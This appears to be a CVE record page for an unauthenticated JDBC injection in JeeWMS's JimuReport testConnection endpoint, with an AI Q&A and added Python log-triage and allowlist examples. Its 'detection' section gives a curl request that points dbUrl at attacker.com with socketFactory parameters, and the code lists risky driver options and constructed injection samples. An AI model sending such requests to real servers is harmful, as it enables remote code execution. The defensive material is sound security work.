CVE-2026-11457
Status: Received - Intake
JeeWMS JimuReport Test-Connection Endpoint Injection

Publication date: 2026-06-07

Last updated on: 2026-06-07

Assigner: VulDB

Description
A security flaw has been discovered in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This vulnerability affects unknown code of the file /base-boot/jmreport/testConnection of the component JimuReport test-connection Endpoint. Performing a manipulation of the argument dbType/dbDriver/dbUrl/dbUsername/dbPassword results in injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.
Meta Information
Published: 2026-06-07
Last Modified: 2026-06-07
Generated: 2026-06-07
AI Q&A: 2026-06-07
EPSS Evaluated: N/A
Affected Vendors & Products
Currently, no data is known.
CWE
CWE-707: The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.
CWE-74: The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in erzhongxmu JeeWMS in the JimuReport test-connection endpoint located at /base-boot/jmreport/testConnection. It allows an attacker to manipulate database connection parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword to perform injection attacks.

Specifically, the endpoint accepts attacker-controlled JDBC parameters without requiring authentication. By providing a malicious PostgreSQL JDBC URL with parameters like socketFactory and socketFactoryArg, an attacker can trigger arbitrary class instantiation through the Spring framework. This can lead to loading a remote Spring XML file controlled by the attacker, enabling execution of arbitrary commands on the server.

The endpoint is accessible without authentication because it is marked as anonymous in the Shiro security configuration, making remote exploitation possible and allowing full server compromise in some cases.


How can this vulnerability impact me?

This vulnerability can have severe impacts including unauthorized remote code execution on the server running JeeWMS. An attacker can execute arbitrary commands, potentially gaining full control over the server.

Even if full remote code execution is not achieved, the flaw allows critical unauthenticated JDBC abuse such as arbitrary class instantiation and outbound network requests, which can be leveraged for further attacks.

Because the vulnerable endpoint does not require authentication, attackers can exploit it remotely without any credentials, increasing the risk and ease of attack.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by testing the accessibility and behavior of the `/base-boot/jmreport/testConnection` endpoint on the target system. Since the endpoint accepts unauthenticated JDBC parameters, you can attempt to send crafted HTTP requests with malicious JDBC URLs to observe if the system processes them.

For detection, you can use tools like curl or any HTTP client to send requests to the endpoint with parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword. For example, sending a request with a PostgreSQL JDBC URL containing parameters like `socketFactory` and `socketFactoryArg` can help verify if the endpoint is vulnerable.

  • curl -X POST "http://target-system/base-boot/jmreport/testConnection" -d "dbType=postgresql&dbDriver=org.postgresql.Driver&dbUrl=jdbc:postgresql://attacker.com:5432/db?socketFactory=attacker.Class&socketFactoryArg=arg&dbUsername=user&dbPassword=pass"

If the server responds without authentication and processes the request, it indicates the endpoint is accessible and potentially vulnerable to injection and remote code execution.
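A defender-side complement to the request check above, added here as an example and not taken from the VulDB record or the JeeWMS project: a Python triage script that scans access-log lines for requests to the test-connection endpoint and rates each one by whether the supplied JDBC URL carries driver-level options a client should never choose (the socketFactory and socketFactoryArg options named in the record, plus a few well-known options of the same kind). The combined-log layout, the assumption that the reverse proxy appends the URL-encoded POST body as a trailing quoted field, the addresses and the "example.Factory" class name are all constructed for the example.

```python
"""Access-log triage for the JimuReport test-connection endpoint.

Added example, not part of the VulDB record or of the JeeWMS project.
Assumptions (all constructed for this example):
  * lines are in combined log format, and the reverse proxy appends the
    URL-encoded POST body as one extra quoted field (many deployments do not
    log bodies; adapt LOG_RE if yours differs);
  * RISKY_JDBC_PARAMS lists the driver options named in the record
    (socketFactory, socketFactoryArg) plus a few well-known driver options of
    the same class-loading / file-access kind.
"""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/base-boot/jmreport/testConnection"

# JDBC URL options that let the *caller* pick classes the driver instantiates
# or files it touches. A client-supplied connection URL should never carry them.
RISKY_JDBC_PARAMS = {
    "socketfactory", "socketfactoryarg",        # PostgreSQL: arbitrary class instantiation
    "sslfactory", "sslfactoryarg",              # PostgreSQL: same mechanism via the SSL factory
    "loggerfile",                               # older PostgreSQL drivers: file write
    "autodeserialize", "allowloadlocalinfile",  # MySQL Connector/J: deserialization / file read
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"(?: "(?P<body>[^"]*)")?$'
)


def jdbc_host_and_options(jdbc_url: str):
    """Split 'jdbc:<sub>://host:port/db?k=v' into (hostname, {option: value})."""
    inner = jdbc_url[5:] if jdbc_url.lower().startswith("jdbc:") else jdbc_url
    parts = urlsplit(inner)
    options = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return parts.hostname, options


def analyse_line(line: str):
    """Return a finding for a request to ENDPOINT, or None for any other line."""
    m = LOG_RE.match(line)
    if not m or m.group("path").split("?", 1)[0] != ENDPOINT:
        return None
    # parse_qs decodes the form body, so an '&' encoded inside dbUrl stays inside it.
    form = {k: v[0] for k, v in parse_qs(m.group("body") or "", keep_blank_values=True).items()}
    finding = {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "authenticated": m.group("user") != "-",   # remote-user field filled in by the proxy
        "db_type": form.get("dbType"),
        "jdbc_host": None,
        "risky_params": [],
    }
    if form.get("dbUrl"):
        host, options = jdbc_host_and_options(form["dbUrl"])
        finding["jdbc_host"] = host
        finding["risky_params"] = sorted(k for k in options if k.lower() in RISKY_JDBC_PARAMS)
    if finding["risky_params"]:
        finding["severity"] = "high"       # client asked the driver to load a class of its choosing
    elif not finding["authenticated"]:
        finding["severity"] = "medium"     # the endpoint should never be reachable anonymously
    else:
        finding["severity"] = "info"
    return finding


def scan(lines):
    """Run analyse_line over an iterable of log lines and keep the hits."""
    return [f for f in (analyse_line(line) for line in lines) if f is not None]


# Constructed sample log lines (addresses from documentation ranges).
SAMPLE_LOG = [
    '10.0.0.8 - admin [07/Jun/2026:10:01:12 +0000] "POST /base-boot/jmreport/testConnection HTTP/1.1" 200 57 "-" "Mozilla/5.0" '
    '"dbType=mysql&dbDriver=com.mysql.cj.jdbc.Driver&dbUrl=jdbc%3Amysql%3A%2F%2Fdb.internal%3A3306%2Fwms%3FuseSSL%3Dtrue&dbUsername=report&dbPassword=REDACTED"',
    '10.0.0.9 - - [07/Jun/2026:10:02:01 +0000] "GET /base-boot/jmreport/list HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Jun/2026:10:03:44 +0000] "POST /base-boot/jmreport/testConnection HTTP/1.1" 200 57 "-" "python-requests/2.31" '
    '"dbType=postgresql&dbDriver=org.postgresql.Driver&dbUrl=jdbc%3Apostgresql%3A%2F%2F198.51.100.23%3A5432%2Fdb%3FsocketFactory%3Dexample.Factory%26socketFactoryArg%3Darg&dbUsername=u&dbPassword=p"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ts']} {f['ip']} auth={f['authenticated']} "
              f"db={f['db_type']} host={f['jdbc_host']} risky={f['risky_params']}")
```

Any hit on the endpoint from an unauthenticated source is worth a look on its own, because the record says the endpoint should not be anonymous; a hit whose JDBC URL names a socketFactory or similar option is the signature of the injection the record describes and should be escalated together with egress logs for the application host around the same timestamp.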


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the `/base-boot/jmreport/testConnection` endpoint to trusted users only, ideally requiring authentication and authorization.

Since the vulnerability arises because the endpoint is marked as anonymous in the Shiro configuration, updating the security configuration to require valid authentication tokens for accessing `/jmreport/**` endpoints is critical.

Additionally, consider disabling or removing the testConnection endpoint if it is not necessary in production environments.

Monitor network traffic for suspicious outbound connections or unusual activity originating from the application server, as exploitation involves loading remote resources.
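The steps above control who can reach the endpoint. The following added example (written for this page in Python; JeeWMS and JimuReport are Java, so read it as a model of the check rather than project code) shows the second layer a reviewer would ask for: the endpoint's unchecked pass-through of dbDriver and dbUrl next to a hardened version that accepts only allowlisted database types, driver classes, hosts and URL options, so a client-chosen class-loading option such as socketFactory never reaches the driver. The allowlisted hosts, ports and option names are constructed assumptions; the dbType, dbDriver and dbUrl field names are the ones the record lists.

```python
"""Server-side allowlist for the test-connection parameters.

Added example written for this page in Python; JeeWMS/JimuReport is Java, so
this is a model of the check, not project code. Allowlisted hosts, ports and
URL options are constructed assumptions; the dbType/dbDriver/dbUrl field names
are the ones in the record.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# dbType -> (driver class the server itself will load, JDBC sub-protocol, default port)
ALLOWED_DB_TYPES = {
    "mysql": ("com.mysql.cj.jdbc.Driver", "mysql", 3306),
    "postgresql": ("org.postgresql.Driver", "postgresql", 5432),
}
ALLOWED_HOSTS = {"db.internal", "reports-db.internal"}                        # constructed
ALLOWED_URL_OPTIONS = {"useSSL", "sslmode", "serverTimezone", "connectTimeout"}  # constructed
DB_NAME_RE = re.compile(r"[A-Za-z0-9_]+")   # one plain database name, no slashes or separators


class RejectedConnection(ValueError):
    """Raised by the hardened path; carries every reason that was found."""


def unchecked_connection_args(form: dict) -> tuple:
    """The 'before': whatever the client sent is handed straight to the driver manager."""
    return form["dbDriver"], form["dbUrl"]


def validate(form: dict) -> list:
    """Return the reasons the request must be refused (empty list = acceptable)."""
    problems = []
    db_type = form.get("dbType", "")
    if db_type not in ALLOWED_DB_TYPES:
        return [f"dbType not allowlisted: {db_type!r}"]
    driver, subprotocol, default_port = ALLOWED_DB_TYPES[db_type]
    # The client must not be able to choose which Driver class gets loaded.
    if form.get("dbDriver") != driver:
        problems.append(f"dbDriver does not match dbType: {form.get('dbDriver')!r}")
    url = form.get("dbUrl", "")
    if not url.startswith("jdbc:"):
        return problems + ["dbUrl is not a JDBC URL"]
    parts = urlsplit(url[len("jdbc:"):])
    if parts.scheme != subprotocol:
        problems.append(f"sub-protocol {parts.scheme!r} does not match dbType")
    if parts.hostname not in ALLOWED_HOSTS:
        problems.append(f"host not allowlisted: {parts.hostname!r}")
    try:
        parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        problems.append("port is not numeric")
    if not DB_NAME_RE.fullmatch(parts.path.lstrip("/")):
        problems.append(f"database name not allowed: {parts.path!r}")
    for key, _ in parse_qsl(parts.query, keep_blank_values=True):
        if key not in ALLOWED_URL_OPTIONS:
            problems.append(f"driver option not allowed: {key}")   # catches socketFactory and friends
    return problems


def hardened_connection_args(form: dict) -> tuple:
    """The 'after': refuse anything off the allowlist and rebuild the URL ourselves."""
    problems = validate(form)
    if problems:
        raise RejectedConnection(problems)
    driver, subprotocol, default_port = ALLOWED_DB_TYPES[form["dbType"]]
    parts = urlsplit(form["dbUrl"][len("jdbc:"):])
    url = f"jdbc:{subprotocol}://{parts.hostname}:{parts.port or default_port}/{parts.path.lstrip('/')}"
    options = parse_qsl(parts.query, keep_blank_values=True)
    if options:
        url += "?" + urlencode(options)
    return driver, url


# Constructed sample requests: one legitimate, one shaped like the record's injection.
GOOD = {"dbType": "mysql", "dbDriver": "com.mysql.cj.jdbc.Driver",
        "dbUrl": "jdbc:mysql://db.internal:3306/wms?useSSL=true",
        "dbUsername": "report", "dbPassword": "p"}
BAD = {"dbType": "postgresql", "dbDriver": "org.postgresql.Driver",
       "dbUrl": "jdbc:postgresql://203.0.113.9:5432/db?socketFactory=example.Factory&socketFactoryArg=arg",
       "dbUsername": "u", "dbPassword": "p"}

if __name__ == "__main__":
    print("unchecked:", unchecked_connection_args(BAD))
    print("hardened, good:", hardened_connection_args(GOOD))
    try:
        hardened_connection_args(BAD)
    except RejectedConnection as e:
        print("hardened, bad: rejected ->", e.args[0])
```

The hardened path deliberately reconstructs the URL from validated pieces instead of forwarding the client's string, so any option the parser did not see (or a second `?` the driver might interpret differently) cannot slip through; that, plus requiring the Shiro filter chain to authenticate `/jmreport/**`, closes both halves of the issue the record describes.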


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows unauthenticated remote code execution and arbitrary command execution on the affected system, potentially leading to unauthorized access to sensitive data.

Such unauthorized access and potential data breaches can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and ensuring system integrity.

Because the vulnerability enables full server compromise without authentication, it increases the risk of data exposure, manipulation, or loss, which are critical compliance concerns under these standards.

